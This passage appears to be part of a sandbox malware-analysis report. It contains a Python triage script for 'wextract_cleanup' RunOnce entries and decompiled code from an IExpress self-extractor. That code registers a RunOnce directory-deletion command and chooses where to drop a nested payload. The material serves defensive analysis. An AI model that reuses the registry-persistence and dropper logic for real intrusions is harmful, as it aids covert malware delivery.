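MAX_SLOTS = 0xC8  # the probing loop in E0013202A gives up after 200 names

# Form written when advpack.dll is used: rundll32.exe <sysdir>advpack.dll,DelNodeRunDLL32 "<dir>"
ADVPACK_RE = re.compile(
    r'^rundll32\.exe\s+(?P<dll>.+?advpack\.dll),DelNodeRunDLL32\s+"(?P<dir>[^"]+)"\s*$', re.I)
# Form written otherwise: <own module path> /D:<dir>
SELF_RE = re.compile(r'^(?P<exe>.+?)\s+/D:(?P<dir>.+?)\s*$', re.I)
# Extraction directories seen on this page look like ...\Temp\IXP002.TMP\ (assumed pattern)
IXP_RE = re.compile(r'\\IXP\d+\.TMP\\?$', re.I)


def parse_cleanup_value(value):
    """Return (variant, extraction_dir) for a wextract-style cleanup command, else None."""
    m = ADVPACK_RE.match(value)
    if m:
        return ("advpack", m.group("dir"))
    m = SELF_RE.match(value)
    if m:
        return ("self", m.group("dir"))
    return None


def next_cleanup_slot(existing_names):
    """Mirror the probing loop: first wextract_cleanup<i> (0..199) not already present.

    Returns None when all 200 names are taken, which is the case in which the
    decompiled function skips registration (the _t87 != 0xc8 check).
    """
    names = set(existing_names)
    for i in range(MAX_SLOTS):
        if f"wextract_cleanup{i}" not in names:
            return i
    return None


def triage_runonce(values):
    """Scan a {value_name: command} map of RunOnce entries for cleanup commands.

    Each finding records which format was used, the directory that will be
    deleted (i.e. where the payload was extracted), and whether that directory
    matches the IXP<n>.TMP naming used by the extractor.
    """
    findings = []
    for name, cmd in values.items():
        parsed = parse_cleanup_value(cmd)
        if parsed is None:
            continue
        variant, target = parsed
        findings.append({
            "name": name,
            "expected_name": name.lower().startswith("wextract_cleanup"),
            "variant": variant,
            "target_dir": target,
            "ixp_temp": bool(IXP_RE.search(target)),
        })
    return findings


if __name__ == "__main__":
    for hit in triage_runonce(SAMPLE_RUNONCE):
        print(hit)
    print("next free slot:", next_cleanup_slot(SAMPLE_RUNONCE))
```

A wextract_cleanup value is not evidence of malice on its own: any IExpress package registers one. Its value is that the captured directory is where the nested payload was dropped, and the "/D:" variant names the extractor binary itself, so both paths are worth collecting before the RunOnce entry fires and removes them.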
C-Code - Quality: 93%
			E0013202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x138004; // 0xe764604f
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00136CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0013171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0013658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x139a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x1391e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x1391e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1391e5);
						if(_t90 != 0) {
							 *0x138580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0013171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E001344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E0013658A( &_v268, 0x104, 0x131140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0x138530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}

APIs
• memset.MSVCRT ref: 00132050
• memset.MSVCRT ref: 0013205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0013208C
  • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001320C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001320EA
• GetSystemDirectoryA.KERNEL32 ref: 00132103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00132134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132144
• GetSystemDirectoryA.KERNEL32 ref: 0013215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0013218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001321C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001321E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0013223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00132250
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
• API String ID: 178549006-2663108224
• Opcode ID: f4f64c613c7a3f8849c13612593081544217ad1352cfa295d97360608dfcaca0
                                                                                                                                                                                                    • Instruction ID: 75f1f56ba1b5f54dbe41a23e7f4abe6d974bb3f7b2b868e34416697b2bf6d9a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f64c613c7a3f8849c13612593081544217ad1352cfa295d97360608dfcaca0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251B771A00214BBDB24AB64DC49FFB7B7CEF55700F0441A4F989E7151DBB19E898A60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 1355a0-1355d9 call 13468f LocalAlloc 235 1355db-1355f1 call 1344b9 call 136285 232->235 236 1355fd-13560c call 13468f 232->236 250 1355f6-1355f8 235->250 242 135632-135643 lstrcmpA 236->242 243 13560e-135630 call 1344b9 LocalFree 236->243 244 135645 242->244 245 13564b-135659 LocalFree 242->245 243->250 244->245 248 135696-13569c 245->248 249 13565b-13565d 245->249 255 1356a2-1356a8 248->255 256 13589f-1358b5 call 136517 248->256 252 135669 249->252 253 13565f-135667 249->253 254 1358b7-1358c7 call 136ce0 250->254 257 13566b-13567a call 135467 252->257 253->252 253->257 255->256 260 1356ae-1356c1 GetTempPathA 255->260 256->254 270 135680-135691 call 1344b9 257->270 271 13589b-13589d 257->271 264 1356f3-135711 call 131781 260->264 265 1356c3-1356c9 call 135467 260->265 275 135717-135729 GetDriveTypeA 264->275 276 13586c-135890 GetWindowsDirectoryA call 13597d 264->276 269 1356ce-1356d0 265->269 269->271 273 1356d6-1356df call 132630 269->273 270->250 271->254 273->264 286 1356e1-1356ed call 135467 273->286 280 135730-135740 GetFileAttributesA 275->280 281 13572b-13572e 275->281 276->264 287 135896 276->287 284 135742-135745 280->284 285 13577e-13578f call 13597d 280->285 281->280 281->284 289 135747-13574f 284->289 290 13576b 284->290 298 1357b2-1357bf call 132630 285->298 299 135791-13579e call 132630 285->299 286->264 286->271 287->271 292 135771-135779 289->292 294 135751-135753 289->294 290->292 297 135864-135866 292->297 294->292 295 135755-135762 call 136952 294->295 295->290 308 135764-135769 295->308 297->275 297->276 306 1357d3-1357f8 call 13658a GetFileAttributesA 298->306 307 1357c1-1357cd GetWindowsDirectoryA 298->307 299->290 309 1357a0-1357b0 call 13597d 299->309 314 13580a 306->314 315 1357fa-135808 CreateDirectoryA 306->315 307->306 
308->285 308->290 309->290 309->298 316 13580d-13580f 314->316 315->316 317 135811-135825 316->317 318 135827-13585c SetFileAttributesA call 131781 call 135467 316->318 317->297 318->271 323 13585e 318->323 323->297
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E001355A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E0013468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E0013468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0x139a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0x138b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0x138a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00136517(_t82, 0x7d2, 0, E00133210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x139a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0x1391e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x1391e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00131781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00136952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0013597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00132630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0013658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x1391e4;
																					E00131781(0x1391e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00135467(0x1391e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00132630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0013597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00135467(0x1391e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x1391e4;
											_t70 = E00132630(0, 0x1391e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x1391e4;
												_t71 = E00135467(0x1391e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0013597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x138b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00135467(0x138b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E001344B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x139124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x139124 = E00136285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00136CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}
Address column of the decompiled listing (collapsed): the report shows one instruction address per decompiled line; this function's lines span 0x001355ab to 0x001358b5.
                                                                                                                                                                                                    0x00135717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356c3
                                                                                                                                                                                                    0x001356c5
                                                                                                                                                                                                    0x001356c9
                                                                                                                                                                                                    0x001356ce
                                                                                                                                                                                                    0x001356d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356d6
                                                                                                                                                                                                    0x001356d6
                                                                                                                                                                                                    0x001356d8
                                                                                                                                                                                                    0x001356dd
                                                                                                                                                                                                    0x001356df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356e1
                                                                                                                                                                                                    0x001356e2
                                                                                                                                                                                                    0x001356e4
                                                                                                                                                                                                    0x001356e6
                                                                                                                                                                                                    0x001356eb
                                                                                                                                                                                                    0x001356ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013586c
                                                                                                                                                                                                    0x00135878
                                                                                                                                                                                                    0x0013587e
                                                                                                                                                                                                    0x00135882
                                                                                                                                                                                                    0x00135883
                                                                                                                                                                                                    0x00135889
                                                                                                                                                                                                    0x0013588e
                                                                                                                                                                                                    0x0013588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135896
                                                                                                                                                                                                    0x001356ed
                                                                                                                                                                                                    0x001356df
                                                                                                                                                                                                    0x001356d0
                                                                                                                                                                                                    0x001356c1
                                                                                                                                                                                                    0x001356a8
                                                                                                                                                                                                    0x0013565b
                                                                                                                                                                                                    0x0013565b
                                                                                                                                                                                                    0x0013565d
                                                                                                                                                                                                    0x00135669
                                                                                                                                                                                                    0x00135669
                                                                                                                                                                                                    0x0013565f
                                                                                                                                                                                                    0x0013565f
                                                                                                                                                                                                    0x00135665
                                                                                                                                                                                                    0x00135667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135667
                                                                                                                                                                                                    0x0013566c
                                                                                                                                                                                                    0x00135673
                                                                                                                                                                                                    0x00135678
                                                                                                                                                                                                    0x0013567a
                                                                                                                                                                                                    0x0013589b
                                                                                                                                                                                                    0x0013589b
                                                                                                                                                                                                    0x00135680
                                                                                                                                                                                                    0x00135685
                                                                                                                                                                                                    0x0013568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013568c
                                                                                                                                                                                                    0x0013567a
                                                                                                                                                                                                    0x0013560e
                                                                                                                                                                                                    0x00135613
                                                                                                                                                                                                    0x0013561a
                                                                                                                                                                                                    0x00135620
                                                                                                                                                                                                    0x00135626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135626
                                                                                                                                                                                                    0x001355db
                                                                                                                                                                                                    0x001355e0
                                                                                                                                                                                                    0x001355e7
                                                                                                                                                                                                    0x001355f1
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001358b7
                                                                                                                                                                                                    0x001358c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001355CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00135638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0013564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00135620
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001356B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0013571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00135737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001357CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001357EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00135802
                                                                                                                                                                                                      • Part of subcall function 00132630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00132654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00135830
                                                                                                                                                                                                      • Part of subcall function 00136517: FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
                                                                                                                                                                                                      • Part of subcall function 00136517: LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
                                                                                                                                                                                                      • Part of subcall function 00136517: DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
                                                                                                                                                                                                      • Part of subcall function 00136517: FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00135878
                                                                                                                                                                                                      • Part of subcall function 0013597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001359A8
                                                                                                                                                                                                      • Part of subcall function 0013597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001359AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
• API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 2436801531-3708386018
• Opcode ID: ef0ca056da5c065a4c20882a960845e6e9362beabc311601c20d6bc61acdb4c1
• Instruction ID: ba5e73d743f7e84031998b5afd4668f2c17a3f27fb287f5abf5ad22266e5a210
• Opcode Fuzzy Hash: ef0ca056da5c065a4c20882a960845e6e9362beabc311601c20d6bc61acdb4c1
• Instruction Fuzzy Hash: 3A813EB1A04A04ABDB24AB358D85BFE776F9F70B10F4400A5F5C6E3191EFB08DC58A60

Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

